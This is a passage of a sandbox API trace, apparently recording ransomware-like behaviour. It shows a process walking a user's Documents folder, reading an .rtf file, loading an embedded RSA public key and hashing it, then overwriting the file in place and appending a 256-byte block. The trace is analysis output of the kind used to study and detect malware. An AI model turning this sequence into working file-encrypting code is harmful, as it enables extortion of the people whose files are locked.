lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0194.732] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0194.735] FindNextFileW (in: hFindFile=0x2cbfa50, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x520df470, ftCreationTime.dwHighDateTime=0x1d8a296, ftLastAccessTime.dwLowDateTime=0x13851bc0, ftLastAccessTime.dwHighDateTime=0x1d8a737, ftLastWriteTime.dwLowDateTime=0x13851bc0, ftLastWriteTime.dwHighDateTime=0x1d8a737, nFileSizeHigh=0x0, nFileSizeLow=0xc2f5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="s oMD9qxXFL8rvNP.rtf", cAlternateFileName="SOMD9Q~1.RTF")) returned 1 [0194.735] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.735] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d920 [0194.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.736] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\s oMD9qxXFL8rvNP.rtf") returned=".rtf" [0194.736] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\s oMD9qxXFL8rvNP.rtf" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\ivotj\\s omd9qxxfl8rvnp.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x574 [0194.736] GetFileSizeEx (in: hFile=0x574, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=49909) returned 1 [0194.737] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0194.739] SetFilePointerEx (in: hFile=0x574, liDistanceToMove=0xc2cf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.739] ReadFile (in: hFile=0x574, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0194.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0194.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0194.741] SetFilePointer (in: hFile=0x574, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.741] ReadFile (in: hFile=0x574, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xc2f5, lpOverlapped=0x0) returned 1 [0194.745] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0194.745] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.745] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.745] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea788) returned 1 [0194.747] CryptCreateHash (in: hProv=0x6ea788, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0194.747] CryptHashData (hHash=0x2cbfa90, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.747] CryptGetHashParam (in: hHash=0x2cbfa90, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0194.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0194.747] CryptGetHashParam (in: hHash=0x2cbfa90, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0194.747] GetLastError () returned 0x0 [0194.747] CryptDestroyHash (hHash=0x2cbfa90) returned 1 [0194.747] CryptReleaseContext (hProv=0x6ea788, dwFlags=0x0) returned 1 [0194.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0194.747] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0194.748] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0194.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0194.748] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0194.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0194.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0194.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc300) returned 0x2d49778 [0194.748] SetFilePointer (in: hFile=0x574, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0194.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0194.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0194.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0194.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0194.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d424a8 [0194.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a030 [0194.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d424f0 [0194.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a048 [0194.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a078 [0194.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0d8 [0194.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a090 [0194.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0194.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0194.749] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0194.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0194.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a078 | out: hHeap=0x6a0000) returned 1 [0194.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a090 | out: hHeap=0x6a0000) returned 1 [0194.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0d8 | out: hHeap=0x6a0000) returned 1 [0194.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0194.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0d8 [0194.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0194.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a090 [0194.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0194.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a078 [0194.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0194.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0194.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27748 [0194.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0194.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0194.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0194.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0194.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0194.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0194.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a090 | out: hHeap=0x6a0000) returned 1 [0194.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0194.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a078 | out: hHeap=0x6a0000) returned 1 [0194.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0194.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0194.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0d8 | out: hHeap=0x6a0000) returned 1 [0194.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0194.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0194.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0194.753] GetCurrentThreadId () returned 0x264 [0194.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0194.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d465a0 [0194.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0194.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea788 [0194.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0194.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0194.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0194.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0194.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.754] GetCurrentThreadId () returned 0x264 [0194.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0194.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0194.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0194.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0194.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c827f8 [0194.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0194.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0194.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0194.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0d8 [0194.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0194.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0194.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0194.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0194.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0194.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0194.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0194.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0194.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a078 [0194.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0194.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0194.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0194.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0194.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0194.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0194.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0194.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a090 [0194.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0194.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0194.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0194.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a060 [0194.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0194.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0f0 [0194.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0194.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0194.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0194.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0c0 [0194.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0194.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0a8 [0194.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0194.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a108 [0194.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0a8 | out: hHeap=0x6a0000) returned 1 [0194.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0a8 [0194.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0c0 | out: hHeap=0x6a0000) returned 1 [0194.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0194.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0194.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0194.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0194.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27748 [0194.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a078 | out: hHeap=0x6a0000) returned 1 [0194.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a078 [0194.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0194.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0194.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0d8 | out: hHeap=0x6a0000) returned 1 [0194.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0194.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a108 | out: hHeap=0x6a0000) returned 1 [0194.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0194.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0194.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0194.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0194.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0194.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a078 | out: hHeap=0x6a0000) returned 1 [0194.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0194.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0194.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0194.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0194.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea788 | out: hHeap=0x6a0000) returned 1 [0194.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0194.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0194.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0194.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0194.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0194.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0194.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0194.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0194.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0a8 | out: hHeap=0x6a0000) returned 1 [0194.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0194.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0f0 | out: hHeap=0x6a0000) returned 1 [0194.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0194.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a090 | out: hHeap=0x6a0000) returned 1 [0194.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a060 | out: hHeap=0x6a0000) returned 1 [0194.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0194.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0194.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0194.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a048 | out: hHeap=0x6a0000) returned 1 [0194.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d424f0 | out: hHeap=0x6a0000) returned 1 [0194.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0194.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0194.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0194.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0194.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0194.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0194.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0194.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0194.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0194.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0194.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0194.766] WriteFile (in: hFile=0x574, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0xc2f0, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0xc2f0, lpOverlapped=0x0) returned 1 [0194.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0194.767] SetFilePointerEx (in: hFile=0x574, liDistanceToMove=0xc2f5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.767] WriteFile (in: hFile=0x574, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0194.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0194.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0194.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0194.768] 